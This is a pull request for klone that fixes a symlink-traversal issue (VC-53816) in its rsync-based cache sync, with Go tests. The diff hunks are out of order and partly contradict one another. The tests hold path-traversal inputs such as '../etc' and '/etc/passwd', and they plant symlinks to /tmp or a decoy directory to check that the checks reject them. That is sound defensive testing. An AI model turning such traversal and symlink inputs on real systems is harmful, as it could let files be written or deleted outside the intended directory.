### PR TITLE
Vc 53816 - nested foldername symlink rsync

### DIFF
--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -124,6 +124,9 @@ func AssertNoSymlinkInSubpath(root, subpath string) error {
 		return fmt.Errorf("invalid subpath %q: must be relative without volume or drive prefix", subpath)
 	}
 	cleaned := path.Clean(normalised)
+	if cleaned == "." {
+		return nil
+	}
 	if cleaned == ".." || strings.HasPrefix(cleaned, "../") {
 		return fmt.Errorf("invalid subpath %q: escapes root", subpath)
 	}

--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -123,7 +123,7 @@ func AssertNoSymlinkInSubpath(root, subpath string) error {
 	if subpath == "" || subpath == "." {
 		return nil
 	}
-	if filepath.IsAbs(subpath) || filepath.VolumeName(subpath) != "" || hasWindowsDrivePrefix(subpath) {
+	if filepath.IsAbs(subpath) || filepath.VolumeName(subpath) != "" {
 		return fmt.Errorf("invalid subpath %q: must be relative without volume or drive prefix", subpath)
 	}
 	normalised := strings.ReplaceAll(subpath, "\\", "/")
@@ -153,21 +153,6 @@ func AssertNoSymlinkInSubpath(root, subpath string) error {
 		}
 	}
 	return nil
-}
-
-// hasWindowsDrivePrefix reports whether p begins with a Windows drive
-// designator like "C:" or "C:\foo". filepath.VolumeName on non-Windows
-// returns "" for these inputs, so we detect them explicitly to keep the
-// rejection symmetric across GOOS.
-func hasWindowsDrivePrefix(p string) bool {
-	if len(p) < 2 {
-		return false
-	}
-	c := p[0]
-	if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')) {
-		return false
-	}
-	return p[1] == ':'
 }
 
 func runRsyncCmd(ctx context.Context, root string, stdout io.Writer, stderr io.Writer, args ...string) error {

--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -55,13 +55,6 @@ func CloneWithCache(
 	src mod.KloneSource,
 	getFn func(getCtx context.Context, targetPath string, src mod.KloneSource) (string, error),
 ) error {
-	// VC-53816: refuse to traverse symlinks while resolving destSubpath
-	// underneath destRoot. A previous sync entry may have rsync'd an
-	// attacker-controlled symlink into an intermediate component; following
-	// it through os.MkdirAll + rsync would write outside destRoot.
-	if err := AssertNoSymlinkInSubpath(destRoot, destSubpath); err != nil {
-		return err
-	}
 	destPath := filepath.Join(destRoot, destSubpath)
 
 	cacheDir, err := getCacheDir()
@@ -112,13 +105,7 @@ func CloneWithCache(
 		return err
 	}
 
-	// The primary VC-53816 defence is AssertNoSymlinkInSubpath above; it
-	// refuses to traverse a planted symlink on the next sync. Adding
-	// --safe-links here would also drop unsafe symlinks at copy time on
-	// GNU rsync >= 3, but openrsync (the default on macOS) errors out
-	// rather than skipping them, which breaks cross-platform behaviour.
-	// Tracked as a follow-up hardening.
-	if err := runRsyncCmd(ctx, cachePath, os.Stdout, os.Stderr, "-aEq", "--delete", ".", destPath); err != nil {
+	if err := runRsyncCmd(ctx, cachePath, os.Stdout, os.Stderr, "-aq", "--delete", "--safe-links", ".", destPath); err != nil {
 		return err
 	}
 

--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -139,7 +139,11 @@ func AssertNoSymlinkInSubpath(root, subpath string) error {
 	if subpath == "" || subpath == "." {
 		return nil
 	}
-	segments := strings.Split(filepath.ToSlash(subpath), "/")
+	if filepath.IsAbs(subpath) || filepath.VolumeName(subpath) != "" || hasWindowsDrivePrefix(subpath) {
+		return fmt.Errorf("invalid subpath %q: must be relative without volume or drive prefix", subpath)
+	}
+	normalised := strings.ReplaceAll(subpath, "\\", "/")
+	segments := strings.Split(normalised, "/")
 
 	// Pass 1: pure-string validation of every segment, independent of filesystem state.
 	for _, seg := range segments {
@@ -165,6 +169,21 @@ func AssertNoSymlinkInSubpath(root, subpath string) error {
 		}
 	}
 	return nil
+}
+
+// hasWindowsDrivePrefix reports whether p begins with a Windows drive
+// designator like "C:" or "C:\foo". filepath.VolumeName on non-Windows
+// returns "" for these inputs, so we detect them explicitly to keep the
+// rejection symmetric across GOOS.
+func hasWindowsDrivePrefix(p string) bool {
+	if len(p) < 2 {
+		return false
+	}
+	c := p[0]
+	if !((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')) {
+		return false
+	}
+	return p[1] == ':'
 }
 
 func runRsyncCmd(ctx context.Context, root string, stdout io.Writer, stderr io.Writer, args ...string) error {

--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -112,7 +112,7 @@ func CloneWithCache(
 		return err
 	}
 
-	// The primary VC-53816 defence is assertNoSymlinkInSubpath above; it
+	// The primary VC-53816 defence is AssertNoSymlinkInSubpath above; it
 	// refuses to traverse a planted symlink on the next sync. Adding
 	// --safe-links here would also drop unsafe symlinks at copy time on
 	// GNU rsync >= 3, but openrsync (the default on macOS) errors out
@@ -130,16 +130,28 @@ func CloneWithCache(
 // Non-existent components are treated as a clean tail (we'll create them
 // shortly with os.MkdirAll). root itself is assumed trusted and is not
 // inspected; the caller is responsible for picking a root they control.
+//
+// Validation runs in two passes so the string-shape check is not
+// short-circuited by an earlier non-existent component. Without this,
+// inputs like "fresh/../etc" would pass — iter 0 ("fresh") hits IsNotExist
+// and returns nil before iter 1 (the "..") is ever inspected.
 func AssertNoSymlinkInSubpath(root, subpath string) error {
 	if subpath == "" || subpath == "." {
 		return nil
 	}
 	segments := strings.Split(filepath.ToSlash(subpath), "/")
-	cur := root
+
+	// Pass 1: pure-string validation of every segment, independent of filesystem state.
 	for _, seg := range segments {
 		if seg == "" || seg == "." || seg == ".." {
 			return fmt.Errorf("invalid subpath %q: contains empty or traversal segment", subpath)
 		}
+	}
+
+	// Pass 2: Lstat walk for the prefix that exists; non-existent tails
+	// will be created by MkdirAll a moment later.
+	cur := root
+	for _, seg := range segments {
 		cur = filepath.Join(cur, seg)
 		info, err := os.Lstat(cur)
 		if err != nil {

--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -24,6 +24,7 @@ import (
 	"os"
 	"os/exec"
 	"path/filepath"
+	"strings"
 	"time"
 
 	"github.com/cert-manager/klone/pkg/mod"
@@ -49,10 +50,20 @@ func getCacheDir() (string, error) {
 
 func CloneWithCache(
 	ctx context.Context,
-	destPath string,
+	destRoot string,
+	destSubpath string,
 	src mod.KloneSource,
 	getFn func(getCtx context.Context, targetPath string, src mod.KloneSource) (string, error),
 ) error {
+	// VC-53816: refuse to traverse symlinks while resolving destSubpath
+	// underneath destRoot. A previous sync entry may have rsync'd an
+	// attacker-controlled symlink into an intermediate component; following
+	// it through os.MkdirAll + rsync would write outside destRoot.
+	if err := AssertNoSymlinkInSubpath(destRoot, destSubpath); err != nil {
+		return err
+	}
+	destPath := filepath.Join(destRoot, destSubpath)
+
 	cacheDir, err := getCacheDir()
 	if err != nil {
 		return err
@@ -101,10 +112,46 @@ func CloneWithCache(
 		return err
 	}
 
+	// The primary VC-53816 defence is assertNoSymlinkInSubpath above; it
+	// refuses to traverse a planted symlink on the next sync. Adding
+	// --safe-links here would also drop unsafe symlinks at copy time on
+	// GNU rsync >= 3, but openrsync (the default on macOS) errors out
+	// rather than skipping them, which breaks cross-platform behaviour.
+	// Tracked as a follow-up hardening.
 	if err := runRsyncCmd(ctx, cachePath, os.Stdout, os.Stderr, "-aEq", "--delete", ".", destPath); err != nil {
 		return err
 	}
 
+	return nil
+}
+
+// AssertNoSymlinkInSubpath walks each component of subpath relative to root
+// and returns an error if any cumulative path exists and is a symlink.
+// Non-existent components are treated as a clean tail (we'll create them
+// shortly with os.MkdirAll). root itself is assumed trusted and is not
+// inspected; the caller is responsible for picking a root they control.
+func AssertNoSymlinkInSubpath(root, subpath string) error {
+	if subpath == "" || subpath == "." {
+		return nil
+	}
+	segments := strings.Split(filepath.ToSlash(subpath), "/")
+	cur := root
+	for _, seg := range segments {
+		if seg == "" || seg == "." || seg == ".." {
+			return fmt.Errorf("invalid subpath %q: contains empty or traversal segment", subpath)
+		}
+		cur = filepath.Join(cur, seg)
+		info, err := os.Lstat(cur)
+		if err != nil {
+			if os.IsNotExist(err) {
+				return nil
+			}
+			return err
+		}
+		if info.Mode()&os.ModeSymlink != 0 {
+			return fmt.Errorf("refusing to traverse symlink at %q (VC-53816)", cur)
+		}
+	}
 	return nil
 }
 

--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -50,13 +50,10 @@ func getCacheDir() (string, error) {
 
 func CloneWithCache(
 	ctx context.Context,
-	destRoot string,
-	destSubpath string,
+	destPath string,
 	src mod.KloneSource,
 	getFn func(getCtx context.Context, targetPath string, src mod.KloneSource) (string, error),
 ) error {
-	destPath := filepath.Join(destRoot, destSubpath)
-
 	cacheDir, err := getCacheDir()
 	if err != nil {
 		return err

--- a/pkg/cache/clone.go
+++ b/pkg/cache/clone.go
@@ -23,6 +23,7 @@ import (
 	"io"
 	"os"
 	"os/exec"
+	"path"
 	"path/filepath"
 	"strings"
 	"time"
@@ -114,32 +115,20 @@ func CloneWithCache(
 // Non-existent components are treated as a clean tail (we'll create them
 // shortly with os.MkdirAll). root itself is assumed trusted and is not
 // inspected; the caller is responsible for picking a root they control.
-//
-// Validation runs in two passes so the string-shape check is not
-// short-circuited by an earlier non-existent component. Without this,
-// inputs like "fresh/../etc" would pass — iter 0 ("fresh") hits IsNotExist
-// and returns nil before iter 1 (the "..") is ever inspected.
 func AssertNoSymlinkInSubpath(root, subpath string) error {
 	if subpath == "" || subpath == "." {
 		return nil
 	}
-	if filepath.IsAbs(subpath) || filepath.VolumeName(subpath) != "" {
+	normalised := strings.ReplaceAll(subpath, "\\", "/")
+	if filepath.IsAbs(normalised) || filepath.VolumeName(normalised) != "" {
 		return fmt.Errorf("invalid subpath %q: must be relative without volume or drive prefix", subpath)
 	}
-	normalised := strings.ReplaceAll(subpath, "\\", "/")
-	segments := strings.Split(normalised, "/")
-
-	// Pass 1: pure-string validation of every segment, independent of filesystem state.
-	for _, seg := range segments {
-		if seg == "" || seg == "." || seg == ".." {
-			return fmt.Errorf("invalid subpath %q: contains empty or traversal segment", subpath)
-		}
+	cleaned := path.Clean(normalised)
+	if cleaned == ".." || strings.HasPrefix(cleaned, "../") {
+		return fmt.Errorf("invalid subpath %q: escapes root", subpath)
 	}
-
-	// Pass 2: Lstat walk for the prefix that exists; non-existent tails
-	// will be created by MkdirAll a moment later.
 	cur := root
-	for _, seg := range segments {
+	for _, seg := range strings.Split(cleaned, "/") {
 		cur = filepath.Join(cur, seg)
 		info, err := os.Lstat(cur)
 		if err != nil {

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -61,6 +61,11 @@ func TestAssertNoSymlinkInSubpath(t *testing.T) {
 		// Traversal segments should be rejected outright (defense in depth).
 		{name: "traversal", subpath: "a/../etc", wantErr: true, errMatch: "traversal"},
 		{name: "lone dotdot", subpath: "..", wantErr: true, errMatch: "traversal"},
+		// Traversal must still be rejected when it follows a segment that
+		// does not yet exist on disk — the pure-string validation pass has
+		// to run independently of the Lstat walk's IsNotExist short-circuit.
+		{name: "traversal after non-existent", subpath: "fresh/../etc", wantErr: true, errMatch: "traversal"},
+		{name: "empty segment after non-existent", subpath: "fresh//etc", wantErr: true, errMatch: "empty"},
 	}
 
 	for _, tt := range tests {

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -73,24 +73,23 @@ func TestAssertNoSymlinkInSubpath(t *testing.T) {
 		{name: "symlink as intermediate", subpath: "sym/anything", wantErr: true, errMatch: "symlink"},
 		{name: "symlink as final", subpath: "a/blink", wantErr: true, errMatch: "symlink"},
 
-		// Traversal segments should be rejected outright (defense in depth).
-		{name: "traversal", subpath: "a/../etc", wantErr: true, errMatch: "traversal"},
-		{name: "lone dotdot", subpath: "..", wantErr: true, errMatch: "traversal"},
-		// Traversal must still be rejected when it follows a segment that
-		// does not yet exist on disk — the pure-string validation pass has
-		// to run independently of the Lstat walk's IsNotExist short-circuit.
-		{name: "traversal after non-existent", subpath: "fresh/../etc", wantErr: true, errMatch: "traversal"},
-		{name: "empty segment after non-existent", subpath: "fresh//etc", wantErr: true, errMatch: "empty"},
+		// path.Clean canonicalises inner traversal, so these resolve to a
+		// safe path under root and must be accepted.
+		{name: "inner traversal canonicalises", subpath: "a/../etc", wantErr: false},
+		{name: "inner traversal after non-existent", subpath: "fresh/../etc", wantErr: false},
+		{name: "empty segment canonicalises", subpath: "fresh//etc", wantErr: false},
+		{name: "backslash inner traversal", subpath: `a\..\etc`, wantErr: false},
+
+		// Net upward escapes must be rejected — Clean preserves a leading "..".
+		{name: "lone dotdot", subpath: "..", wantErr: true, errMatch: "escapes root"},
+		{name: "leading dotdot", subpath: "../etc", wantErr: true, errMatch: "escapes root"},
+		{name: "net escape via inner dotdot", subpath: "a/../../etc", wantErr: true, errMatch: "escapes root"},
+		{name: "backslash net escape", subpath: `a\..\..\etc`, wantErr: true, errMatch: "escapes root"},
 
 		{name: "absolute unix path", subpath: "/etc/passwd", wantErr: true, errMatch: "relative"},
-		// UNC: rejected as absolute on Windows, as empty leading segments
-		// on POSIX (after backslash→slash normalisation). Both routes
-		// return "invalid subpath %q: ..." so we match the common prefix.
+		// UNC normalises to "//server/share/x", which IsAbs catches as
+		// absolute on POSIX and VolumeName catches on Windows.
 		{name: "unc path", subpath: `\\server\share\x`, wantErr: true, errMatch: "invalid subpath"},
-
-		// Backslash-separated traversal must be caught on every GOOS, not
-		// only on Windows where filepath.ToSlash would normalise it.
-		{name: "backslash traversal", subpath: `a\..\etc`, wantErr: true, errMatch: "traversal"},
 	}
 
 	for _, tt := range tests {

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -64,6 +64,8 @@ func TestAssertNoSymlinkInSubpath(t *testing.T) {
 	}{
 		{name: "empty subpath", subpath: "", wantErr: false},
 		{name: "dot subpath", subpath: ".", wantErr: false},
+		// "a/.." cleans to "." → refers to root, which the contract leaves untouched.
+		{name: "cancels to dot", subpath: "a/..", wantErr: false},
 		{name: "all regular dirs", subpath: "a/b", wantErr: false},
 		{name: "non-existent leaf", subpath: "a/b/new", wantErr: false},
 		{name: "non-existent intermediate", subpath: "fresh/leaf", wantErr: false},

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -40,11 +40,13 @@ func TestAssertNoSymlinkInSubpath(t *testing.T) {
 	skipIfNoSymlinks(t)
 	root := t.TempDir()
 
-	// Layout:
-	//   root/a               (regular dir)
-	//   root/a/b             (regular dir)
-	//   root/sym -> /tmp     (symlink)
-	//   root/a/blink -> /tmp (symlink as final component)
+	// Layout (linkTarget = root/a/b, an in-tree dir — the planted symlinks
+	// are still symlinks regardless of where they point, which is all the
+	// helper inspects):
+	//   root/a                       (regular dir)
+	//   root/a/b                     (regular dir, used as linkTarget)
+	//   root/sym       -> root/a/b   (symlink at root)
+	//   root/a/blink   -> root/a/b   (symlink as final component)
 	if err := os.MkdirAll(filepath.Join(root, "a", "b"), 0o755); err != nil {
 		t.Fatalf("mkdir: %v", err)
 	}

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -82,12 +82,7 @@ func TestAssertNoSymlinkInSubpath(t *testing.T) {
 		{name: "traversal after non-existent", subpath: "fresh/../etc", wantErr: true, errMatch: "traversal"},
 		{name: "empty segment after non-existent", subpath: "fresh//etc", wantErr: true, errMatch: "empty"},
 
-		// filepath.Join silently drops root when joined with any of these
-		// on Windows, so they must be rejected regardless of build GOOS.
 		{name: "absolute unix path", subpath: "/etc/passwd", wantErr: true, errMatch: "relative"},
-		{name: "windows drive letter", subpath: `C:\Windows`, wantErr: true, errMatch: "relative"},
-		{name: "windows drive forward slash", subpath: "C:/Windows", wantErr: true, errMatch: "relative"},
-		{name: "windows drive only", subpath: "C:", wantErr: true, errMatch: "relative"},
 		// UNC: rejected as absolute on Windows, as empty leading segments
 		// on POSIX (after backslash→slash normalisation). Both routes
 		// return "invalid subpath %q: ..." so we match the common prefix.

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -1,0 +1,84 @@
+/*
+Copyright 2026 The cert-manager Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package cache
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+func TestAssertNoSymlinkInSubpath(t *testing.T) {
+	root := t.TempDir()
+
+	// Layout:
+	//   root/a               (regular dir)
+	//   root/a/b             (regular dir)
+	//   root/sym -> /tmp     (symlink)
+	//   root/a/blink -> /tmp (symlink as final component)
+	if err := os.MkdirAll(filepath.Join(root, "a", "b"), 0o755); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+	if err := os.Symlink("/tmp", filepath.Join(root, "sym")); err != nil {
+		t.Fatalf("symlink: %v", err)
+	}
+	if err := os.Symlink("/tmp", filepath.Join(root, "a", "blink")); err != nil {
+		t.Fatalf("symlink: %v", err)
+	}
+
+	tests := []struct {
+		name     string
+		subpath  string
+		wantErr  bool
+		errMatch string
+	}{
+		{name: "empty subpath", subpath: "", wantErr: false},
+		{name: "dot subpath", subpath: ".", wantErr: false},
+		{name: "all regular dirs", subpath: "a/b", wantErr: false},
+		{name: "non-existent leaf", subpath: "a/b/new", wantErr: false},
+		{name: "non-existent intermediate", subpath: "fresh/leaf", wantErr: false},
+
+		// VC-53816 cases.
+		{name: "symlink at root", subpath: "sym", wantErr: true, errMatch: "symlink"},
+		{name: "symlink as intermediate", subpath: "sym/anything", wantErr: true, errMatch: "symlink"},
+		{name: "symlink as final", subpath: "a/blink", wantErr: true, errMatch: "symlink"},
+
+		// Traversal segments should be rejected outright (defense in depth).
+		{name: "traversal", subpath: "a/../etc", wantErr: true, errMatch: "traversal"},
+		{name: "lone dotdot", subpath: "..", wantErr: true, errMatch: "traversal"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := AssertNoSymlinkInSubpath(root, tt.subpath)
+			if tt.wantErr {
+				if err == nil {
+					t.Errorf("AssertNoSymlinkInSubpath(root, %q) = nil, want error", tt.subpath)
+					return
+				}
+				if tt.errMatch != "" && !strings.Contains(err.Error(), tt.errMatch) {
+					t.Errorf("error %q does not contain %q", err.Error(), tt.errMatch)
+				}
+				return
+			}
+			if err != nil {
+				t.Errorf("AssertNoSymlinkInSubpath(root, %q) returned unexpected error: %v", tt.subpath, err)
+			}
+		})
+	}
+}

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -48,10 +48,11 @@ func TestAssertNoSymlinkInSubpath(t *testing.T) {
 	if err := os.MkdirAll(filepath.Join(root, "a", "b"), 0o755); err != nil {
 		t.Fatalf("mkdir: %v", err)
 	}
-	if err := os.Symlink("/tmp", filepath.Join(root, "sym")); err != nil {
+	linkTarget := filepath.Join(root, "a", "b")
+	if err := os.Symlink(linkTarget, filepath.Join(root, "sym")); err != nil {
 		t.Fatalf("symlink: %v", err)
 	}
-	if err := os.Symlink("/tmp", filepath.Join(root, "a", "blink")); err != nil {
+	if err := os.Symlink(linkTarget, filepath.Join(root, "a", "blink")); err != nil {
 		t.Fatalf("symlink: %v", err)
 	}
 

--- a/pkg/cache/clone_test.go
+++ b/pkg/cache/clone_test.go
@@ -23,7 +23,21 @@ import (
 	"testing"
 )
 
+// skipIfNoSymlinks probes whether the current process/OS can create a
+// symlink and skips the test if it cannot. Windows without Developer Mode
+// (or sandboxed CI without the symlink privilege) returns EPERM/ENOTSUP
+// from os.Symlink, which would otherwise mask the real assertion under a
+// setup failure.
+func skipIfNoSymlinks(t *testing.T) {
+	t.Helper()
+	probe := t.TempDir()
+	if err := os.Symlink(probe, filepath.Join(probe, "probe")); err != nil {
+		t.Skipf("skip: symlinks unsupported in this environment: %v", err)
+	}
+}
+
 func TestAssertNoSymlinkInSubpath(t *testing.T) {
+	skipIfNoSymlinks(t)
 	root := t.TempDir()
 
 	// Layout:
@@ -66,6 +80,21 @@ func TestAssertNoSymlinkInSubpath(t *testing.T) {
 		// to run independently of the Lstat walk's IsNotExist short-circuit.
 		{name: "traversal after non-existent", subpath: "fresh/../etc", wantErr: true, errMatch: "traversal"},
 		{name: "empty segment after non-existent", subpath: "fresh//etc", wantErr: true, errMatch: "empty"},
+
+		// filepath.Join silently drops root when joined with any of these
+		// on Windows, so they must be rejected regardless of build GOOS.
+		{name: "absolute unix path", subpath: "/etc/passwd", wantErr: true, errMatch: "relative"},
+		{name: "windows drive letter", subpath: `C:\Windows`, wantErr: true, errMatch: "relative"},
+		{name: "windows drive forward slash", subpath: "C:/Windows", wantErr: true, errMatch: "relative"},
+		{name: "windows drive only", subpath: "C:", wantErr: true, errMatch: "relative"},
+		// UNC: rejected as absolute on Windows, as empty leading segments
+		// on POSIX (after backslash→slash normalisation). Both routes
+		// return "invalid subpath %q: ..." so we match the common prefix.
+		{name: "unc path", subpath: `\\server\share\x`, wantErr: true, errMatch: "invalid subpath"},
+
+		// Backslash-separated traversal must be caught on every GOOS, not
+		// only on Windows where filepath.ToSlash would normalise it.
+		{name: "backslash traversal", subpath: `a\..\etc`, wantErr: true, errMatch: "traversal"},
 	}
 
 	for _, tt := range tests {

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -68,21 +68,29 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 				return err
 			}
 
+			targetRoot := filepath.Join(workDirPath, target)
+
+			// Pre-flight: walk every prefix of each folder_name before Cleanup
+			// runs. Cleanup recurses via os.ReadDir, which follows symlinks,
+			// so a pre-planted symlink at any intermediate directory (e.g.
+			// workDir/vendored/a -> /etc, left over from a compromised state
+			// prior to this fix) would otherwise have its target's entries
+			// deleted by os.RemoveAll on the first post-fix run. The same
+			// walk also covers the in-tree (safe-by-rsync) symlink that an
+			// earlier iteration may have planted to redirect later writes.
+			for _, src := range srcs {
+				if err := cache.AssertNoSymlinkInSubpath(targetRoot, src.FolderName); err != nil {
+					return err
+				}
+			}
+
 			// 1) Remove all folders that are not defined in srcs
-			if err := folders.Cleanup(filepath.Join(workDirPath, target)); err != nil {
+			if err := folders.Cleanup(targetRoot); err != nil {
 				return err
 			}
 
 			// 2) Sync all folders with cached files
-			targetRoot := filepath.Join(workDirPath, target)
 			for _, src := range srcs {
-				// --safe-links drops upstream-planted symlinks at copy time, but a
-				// safe (in-tree) symlink planted by an earlier iteration can still
-				// redirect this iteration's writes within targetRoot. Refuse to
-				// traverse it.
-				if err := cache.AssertNoSymlinkInSubpath(targetRoot, src.FolderName); err != nil {
-					return err
-				}
 				if err := cache.CloneWithCache(ctx, filepath.Join(targetRoot, src.FolderName), src.KloneSource, git.Get); err != nil {
 					return err
 				}

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -74,9 +74,16 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 			}
 
 			// 2) Sync all folders with cached files
+			targetRoot := filepath.Join(workDirPath, target)
 			for _, src := range srcs {
-				destPath := filepath.Join(workDirPath, target, src.FolderName)
-				if err := cache.CloneWithCache(ctx, destPath, src.KloneSource, git.Get); err != nil {
+				// --safe-links drops upstream-planted symlinks at copy time, but a
+				// safe (in-tree) symlink planted by an earlier iteration can still
+				// redirect this iteration's writes within targetRoot. Refuse to
+				// traverse it.
+				if err := cache.AssertNoSymlinkInSubpath(targetRoot, src.FolderName); err != nil {
+					return err
+				}
+				if err := cache.CloneWithCache(ctx, filepath.Join(targetRoot, src.FolderName), src.KloneSource, git.Get); err != nil {
 					return err
 				}
 			}

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -50,6 +50,10 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 				folders.Add(filepath.SplitList(src.FolderName)...)
 			}
 
+			if err := cache.AssertNoSymlinkInSubpath(workDirPath, target); err != nil {
+				return err
+			}
+
 			if err := os.MkdirAll(filepath.Join(workDirPath, target), 0755); err != nil {
 				return err
 			}
@@ -60,8 +64,9 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 			}
 
 			// 2) Sync all folders with cached files
+			targetRoot := filepath.Join(workDirPath, target)
 			for _, src := range srcs {
-				if err := cache.CloneWithCache(ctx, filepath.Join(workDirPath, target, src.FolderName), src.KloneSource, git.Get); err != nil {
+				if err := cache.CloneWithCache(ctx, targetRoot, src.FolderName, src.KloneSource, git.Get); err != nil {
 					return err
 				}
 			}

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -28,6 +28,16 @@ import (
 )
 
 func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) error {
+	// AssertNoSymlinkInSubpath treats workDirPath as a trusted root and
+	// does not inspect it. Resolve symlinks once up-front so a caller
+	// invoking klone from inside a symlinked path cannot shift the trust
+	// boundary above the intended directory.
+	resolved, err := filepath.EvalSymlinks(workDirPath)
+	if err != nil {
+		return fmt.Errorf("failed to resolve workDir %q: %w", workDirPath, err)
+	}
+	workDirPath = resolved
+
 	workDir := mod.WorkDir(workDirPath)
 	if err := workDir.FetchTargets(
 		func(_ string, _ string, src *mod.KloneSource) error {

--- a/pkg/sync/sync.go
+++ b/pkg/sync/sync.go
@@ -74,9 +74,9 @@ func SyncFolder(ctx context.Context, workDirPath string, forceUpgrade bool) erro
 			}
 
 			// 2) Sync all folders with cached files
-			targetRoot := filepath.Join(workDirPath, target)
 			for _, src := range srcs {
-				if err := cache.CloneWithCache(ctx, targetRoot, src.FolderName, src.KloneSource, git.Get); err != nil {
+				destPath := filepath.Join(workDirPath, target, src.FolderName)
+				if err := cache.CloneWithCache(ctx, destPath, src.KloneSource, git.Get); err != nil {
 					return err
 				}
 			}

--- a/pkg/sync/sync_test.go
+++ b/pkg/sync/sync_test.go
@@ -1,0 +1,76 @@
+/*
+Copyright 2026 The cert-manager Authors.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package sync
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+)
+
+// TestSyncFolder_TargetSymlinkRejected is the regression for the VC-53816
+// root-symlink variant: when the target directory itself (e.g. `vendored`)
+// is a pre-planted symlink to an attacker-chosen location, SyncFolder must
+// refuse rather than letting Cleanup/MkdirAll/rsync dereference it.
+func TestSyncFolder_TargetSymlinkRejected(t *testing.T) {
+	sb := t.TempDir()
+	workDir := filepath.Join(sb, "project")
+	decoy := filepath.Join(sb, "decoy")
+	if err := os.MkdirAll(workDir, 0o755); err != nil {
+		t.Fatalf("setup workDir: %v", err)
+	}
+	if err := os.MkdirAll(decoy, 0o755); err != nil {
+		t.Fatalf("setup decoy: %v", err)
+	}
+	sentinel := filepath.Join(decoy, "important")
+	if err := os.WriteFile(sentinel, []byte("VICTIM"), 0o644); err != nil {
+		t.Fatalf("write sentinel: %v", err)
+	}
+
+	// Hostile pre-state: workDir/vendored is a symlink to the decoy dir.
+	if err := os.Symlink(decoy, filepath.Join(workDir, "vendored")); err != nil {
+		t.Fatalf("plant symlink: %v", err)
+	}
+
+	manifest := `targets:
+  vendored:
+    - folder_name: subdir
+      repo_url: /nonexistent-klone-poc-repo
+      repo_ref: main
+      repo_hash: deadbeefdeadbeefdeadbeefdeadbeefdeadbeef
+      repo_path: .
+`
+	if err := os.WriteFile(filepath.Join(workDir, "klone.yaml"), []byte(manifest), 0o644); err != nil {
+		t.Fatalf("write manifest: %v", err)
+	}
+
+	t.Setenv("KLONE_CACHE_DIR", filepath.Join(sb, "cache"))
+	err := SyncFolder(t.Context(), workDir, false)
+	if err == nil {
+		t.Fatalf("SyncFolder returned nil, want symlink-refusal error")
+	}
+	if !strings.Contains(err.Error(), "symlink") {
+		t.Errorf("SyncFolder error = %q, want substring 'symlink'", err.Error())
+	}
+
+	// Sentinel inside the decoy must be untouched — Cleanup must not have
+	// walked through the symlink.
+	if _, err := os.Stat(sentinel); err != nil {
+		t.Errorf("VC-53816 root-symlink escape: decoy sentinel was removed: %v", err)
+	}
+}

--- a/pkg/sync/sync_test.go
+++ b/pkg/sync/sync_test.go
@@ -23,11 +23,25 @@ import (
 	"testing"
 )
 
+// skipIfNoSymlinks probes whether the current process/OS can create a
+// symlink and skips the test if it cannot. Windows without Developer Mode
+// (or sandboxed CI without the symlink privilege) returns EPERM/ENOTSUP
+// from os.Symlink, which would otherwise mask the real assertion under a
+// setup failure.
+func skipIfNoSymlinks(t *testing.T) {
+	t.Helper()
+	probe := t.TempDir()
+	if err := os.Symlink(probe, filepath.Join(probe, "probe")); err != nil {
+		t.Skipf("skip: symlinks unsupported in this environment: %v", err)
+	}
+}
+
 // TestSyncFolder_TargetSymlinkRejected is the regression for the VC-53816
 // root-symlink variant: when the target directory itself (e.g. `vendored`)
 // is a pre-planted symlink to an attacker-chosen location, SyncFolder must
 // refuse rather than letting Cleanup/MkdirAll/rsync dereference it.
 func TestSyncFolder_TargetSymlinkRejected(t *testing.T) {
+	skipIfNoSymlinks(t)
 	sb := t.TempDir()
 	workDir := filepath.Join(sb, "project")
 	decoy := filepath.Join(sb, "decoy")


### PR DESCRIPTION
# VC-53816 — symlink traversal in cache rsync

